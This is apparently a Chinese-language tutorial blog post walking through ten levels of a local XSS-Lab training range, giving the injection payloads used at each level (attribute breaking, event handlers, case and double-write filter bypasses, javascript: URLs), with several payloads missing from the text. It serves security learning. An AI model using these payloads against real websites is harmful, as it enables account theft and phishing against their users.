XSS靶场漏洞实践及总结

XSS是当今网络安全事件中数量最多的攻击方式,虽然其危害性不高,但主要和其他攻击手段相结合,以实现一个复杂的攻击场景。那么,XSS是什么?

XSS全称跨站脚本(Cross Site Scripting),较合适的方式应该叫做跨站脚本攻击跨站脚本 攻击是一种常见的web安全漏洞,它主要是指攻击者可以在页面中插入恶意脚本代码,当受 害者访问这些页面时,浏览器会解析并执行这些恶意代码,被用于进行窃取隐私、钓鱼欺 骗、窃取密码、传播恶意代码等攻击。
XSS攻击使用到的技术主要为HTML和Javascript,也包括VBScript和ActionScript等。XSS 攻击对WEB服务器虽无直接危害,但是它借助网站进行传播,使网站的使用用户受到攻击,导致网站用户帐号被窃取,从而对网站也产生了较严重的危害。

近期,看到一个好玩的XSS的靶场,于是进行了实践,并做了笔记。
本教程基于XSS-Lab靶场的本地环境进行练习

环境搭建

本教程基于以下环境:

  • Windows 10
  • Chrome浏览器(即谷歌浏览器)
  • Wamp Server

靶场运行

  1. 下载Wamp Server并双击安装
  2. 下载XSS-Lab源码,并解压,将文件夹重命名为XSS,放到wamp的安装目录下的www目录中
  3. 打开浏览器,地址栏输入localhost/XSS/即可访问

实践

第一关

第一关十分简单,在地址栏的name字段直接写payload即可:

http://localhost/xss/level1.php?name=

第二关

通过观察,可以发现字段keyword在页面的标题和输入框内均会显示,因此,可以用两种方法插入:

1. 闭合标签

通过构造一个>使前面的开标签闭合,接着构造一个新标签即可

http://localhost/xss/level2.php?keyword=">

2. 闭合属性双引号

通过闭合input标签的value属性的双引号,接着添加点击事件插入js代码来完成
地址栏输入以下带payload的链接:

http://localhost/xss/level2.php?keyword=" onclick="alert(/xss/)

点击输入框,即可实现XSS

第三关

第三关使用之前的payload已经行不通了,可以猜测是否是使用了单引号来绕过XSS插入,因此,用单引号进行尝试:

http://localhost/xss/level3.php?keyword=' onmouseover='alert(/xss/)

最后,对源码进行分析,可以看到这句代码,显示其的确是用单引号进行属性闭合的:


第四关

第四关发现标题不好注入,因此针对输入框下手:

http://localhost/xss/level4.php?keyword=" onfocus="alert(/xss/)

第五关

第五关使用之前的payload进行注入发现过滤了scripton

第五关

因此,尝试使用闭合标签,构造a标签插入XSS:

http://localhost/xss/level5.php?keyword=">xss

第六关

第六关可以使用大小写绕过:

http://localhost/xss/level6.php?keyword=" ONmouseover="alert(/xss/)

第七关

使用之前的payload发现on被替换成了空字符,因此可采用双写实现:

http://localhost/xss/level7.php?keyword=" oonnfocus="alert(/xss/)

第八关

这次代码先是将字符转换为小写,然后过滤特殊字符和双引号,最后又怕有漏网之鱼加了一 个转义函数输出,所以按常规方法绕几乎不可能成功,代码处的添加友情链接是突破点,在 input框中输入字符提交之后,在友情链接处会载入一个拼接后的a标签,因为javascript被 过滤对其进行编码绕过再点击友情链接即可。
在输入框内输入:

javascript:alert(/xss/)

第九关

这关需要匹配http://才被认为是合法的URL,因此在输入框输入以下payload,为了不报错,在http前面加上//表示注释:

javascript:alert(/xss/)//http://

第十关

通过观察代码,发现程序接收了t_sort字段作为参数,并且过滤了尖括号,同时,需要将输入框显示出来:

http://localhost/xss/level10.php?keyword=Good&t_sort=xss" onclick=alert(/xss/) type="text"

总结

XSS漏洞挖掘的要点:

  • URL及其参数
  • 表单
  • 页面任意输入、输出的地方
  • 代码审计

XSS漏洞payload构造:

  • 直接构造
  • 通过闭合标签
  • 通过闭合属性双/单引号
  • 构造标签事件以绑定js程序,如:
    • onclick
    • onmouseover
    • onfocus
    • onerror
    • oninput
    • onload
    • href="javascript:
    • background=""
  • 构造标签/CSS属性使访问外部链接,如:
    • background: url("hack url")